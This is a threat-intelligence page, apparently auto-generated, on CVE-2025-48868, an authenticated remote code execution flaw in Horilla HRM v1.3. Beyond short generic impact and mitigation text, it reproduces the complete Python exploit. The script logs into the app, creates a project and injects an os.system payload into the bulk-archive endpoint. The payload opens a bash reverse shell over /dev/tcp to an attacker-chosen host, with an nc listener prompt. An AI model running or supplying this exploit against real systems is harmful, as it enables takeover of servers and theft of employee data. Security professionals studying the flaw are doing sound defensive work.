Horilla v1.3 - RCE
Horilla v1.3 - RCE
AI Analysis
Technical Summary
This threat concerns a remote code execution vulnerability in Horilla version 1.3. The exploit allows an attacker to execute arbitrary code remotely, potentially compromising the affected system. The exploit code is available in Python, facilitating potential exploitation. No detailed technical or patch information is provided, and the affected versions beyond 1.3 are not specified.
Potential Impact
Successful exploitation could allow an attacker to execute arbitrary code on the affected system, potentially leading to full system compromise depending on the privileges of the exploited process. No reports of active exploitation in the wild have been noted.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the affected service and monitor for suspicious activity related to Horilla 1.3. Avoid deploying this version in untrusted environments.
Indicators of Compromise
- exploit-code: # Exploit Title: Horilla v1.3 - RCE # Date: 2025-05-29 # Exploit Author: Raghad Abdallah Al-syouf # Version: <= 1.3 # Tested on: Ubuntu / Docker # CVE: CVE-2025-48868 Description: This script exploits the authenticated RCE vulnerability CVE-2025-48868. It logs into the target web app, creates a project, and sends payloads to achieve a reverse shell connection to a listener **started manually** by the user. Usage: python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT Example: python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444 """ import requests import time import sys import argparse from bs4 import BeautifulSoup import urllib3 import random import string from datetime import datetime urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generate_random_title(): letters = ''.join(random.choices(string.ascii_lowercase, k=4)) digits = ''.join(random.choices(string.digits, k=2)) return letters + digits def main(): print("[+] CVE-2025-48868") parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan') parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000') parser.add_argument('--user', required=True, help='Username for login') parser.add_argument('--pass', required=True, dest='password', help='Password for login') parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)') parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)') args = parser.parse_args() base_url = args.url.rstrip('/') login_url = f"{base_url}/login/" project_url = f"{base_url}/project/project-bulk-archive" session = requests.Session() headers = { "User-Agent": "Mozilla/5.0", "X-Requested-With": "XMLHttpRequest" } print("[+] Getting login page...") login_page = session.get(login_url, headers=headers, verify=False) if login_page.status_code != 200: print(f"[-] Failed to load login page, status {login_page.status_code}") sys.exit(1) soup = BeautifulSoup(login_page.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] login_data = { "username": args.user, "password": args.password, "csrfmiddlewaretoken": csrf_token } print("[+] Logging in...") login_resp = session.post(login_url, data=login_data, headers=headers, verify=False) if login_resp.status_code != 200 or "logout" not in login_resp.text.lower(): print("[-] Login failed") sys.exit(1) print("[+] Logged in successfully!") project_view_url = f"{base_url}/project/project-view/" project_view = session.get(project_view_url, headers=headers, verify=False) soup = BeautifulSoup(project_view.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] print("[+] Creating project...") create_project_url = f"{base_url}/project/create-project?" today_str = datetime.now().strftime("%Y-%m-%d") random_title = generate_random_title() multipart_data = { "is_active": "on", "title": random_title, "managers": "1", "members": "1", "status": "new", "start_date": today_str, "end_date": today_str, "description": "Exploit project" } create_headers = { "User-Agent": "Mozilla/5.0", "Accept": "*/*", "Referer": project_view_url, "HX-Request": "true", "HX-Trigger": "hlvd701Form", "HX-Target": "hlvd701Form", "HX-Current-URL": project_view_url, "X-CSRFToken": csrf_token, "Origin": base_url, "DNT": "1", "Connection": "keep-alive", } create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False) if create_resp.status_code == 200: print(f"[+] Project created successfully with title: {random_title}") else: print(f"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...") headers["Referer"] = project_view_url headers["Origin"] = base_url headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" print("[*] Ensure your listener is running: `nc -lvnp {}`".format(args.lport)) print("[+] Sending payload...") i = 1 while True: encoded_ids = f"%5B%22{i}%22%5D" payload = f"__import__('os').system('bash+-c+\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\"')" exploit_url = f"{project_url}?is_active={payload}" data = f"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}" response = session.post(exploit_url, headers=headers, data=data, verify=False) if response.status_code == 200: print(f"[+] Payload sent for project id {i}. Waiting for shell...") else: print(f"[-] Error sending payload for project id {i} (status {response.status_code})") time.sleep(3) i += 1 if __name__ == "__main__": main()
Horilla v1.3 - RCE
Description
Horilla v1.3 - RCE
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat concerns a remote code execution vulnerability in Horilla version 1.3. The exploit allows an attacker to execute arbitrary code remotely, potentially compromising the affected system. The exploit code is available in Python, facilitating potential exploitation. No detailed technical or patch information is provided, and the affected versions beyond 1.3 are not specified.
Potential Impact
Successful exploitation could allow an attacker to execute arbitrary code on the affected system, potentially leading to full system compromise depending on the privileges of the exploited process. No reports of active exploitation in the wild have been noted.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the affected service and monitor for suspicious activity related to Horilla 1.3. Avoid deploying this version in untrusted environments.
Technical Details
- Edb Id
- 52497
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Horilla v1.3 - RCE
# Exploit Title: Horilla v1.3 - RCE # Date: 2025-05-29 # Exploit Author: Raghad Abdallah Al-syouf # Version: <= 1.3 # Tested on: Ubuntu / Docker # CVE: CVE-2025-48868 Description: This script exploits the authenticated RCE vulnerability CVE-2025-48868. It logs into the target web app, creates a project, and sends payloads to achieve a reverse shell connection to a listener **started manually** by the user. Usage: python3 CVE_2025_48868.py --url http[s]://target:port --user username --pas... (4874 more characters)
Threat ID: 69d842c21cc7ad14da3f5b38
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:23:18 AM
Last updated: 4/10/2026, 8:31:05 AM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.